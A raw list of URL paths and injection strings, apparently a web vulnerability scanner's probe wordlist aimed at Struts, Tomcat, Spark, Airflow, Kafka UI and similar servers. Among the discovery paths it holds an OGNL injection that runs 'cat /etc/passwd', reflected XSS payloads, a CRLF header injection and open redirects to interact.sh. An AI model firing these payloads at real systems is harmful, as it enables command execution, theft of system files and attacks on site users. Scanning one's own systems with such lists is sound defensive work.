/examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp
/login.action
/lui/
/hub/
/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))
/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}
/index.action?redirect:http://www.interact.sh/
/~user/%0D%0ASet-Cookie:crlfinjection
//interact.sh
/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68
/printenv.shtml?{{url_encode(payload)}}
/ssi/printenv.shtml?{{url_encode(payload)}}
/%5cgoogle.com/evil.html
/http%3A%2F%2Fwww.interact.sh
/kylin/api/admin/config
/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(/xss/)%3E
/solr/admin/metrics
/airflow.cfg
/apache.conf
/conf
/engine-ui/0.0.0.0:4040/environment/
/appconfigs
/perl-status
/api/v1/cluster/summary
/api/v1/applications
/environment/
/jobs/
:4040/jobs/
/signup

/ui/clusters/kafka-ui/brokers
/{{randstr}}
